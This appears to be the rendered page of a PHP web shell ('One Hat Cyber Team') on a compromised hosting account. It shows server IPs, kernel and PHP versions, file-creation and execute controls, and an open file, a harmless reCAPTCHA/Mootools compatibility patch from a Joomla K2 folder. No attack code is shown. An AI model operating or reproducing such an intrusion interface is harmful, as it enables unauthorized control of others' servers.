One Hat Cyber Team
Your IP:
216.73.216.75
Server IP:
213.186.33.17
Server:
Linux webm007.cluster106.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Create File
|
Create Folder
Execute
Dir :
~
/
home
/
tcherkas
/
micha.paris
/
media
/
k2
/
assets
/
js
/
Edit File:
k2.rc.patch.js
/* * Patch for reCAPTCHA with Mootools 1.2 Compatibility Layer * * @author James Sleeman <james@gogo.co.nz> * @see https://github.com/google/recaptcha/issues/374 * * Source: https://gist.github.com/sleemanj/f076ed2c0b887ab08074b55dad2fd636 * */ Function.prototype._compatbind = Function.prototype.bind; delete Function.prototype.bind; Function.implement({ _polybind: function(bind) { var self = this, args = (arguments.length > 1) ? Array.slice(arguments, 1) : null; return function() { if (!args && !arguments.length) return self.call(bind); if (args && arguments.length) return self.apply(bind, args.concat(Array.from(arguments))); return self.apply(bind, args || arguments); }; }, bind: function(bind, args) { if ((new Error()).stack.match(/recaptcha/)) { return this._polybind(bind, args); } return this._compatbind(bind, args); } });
Simpan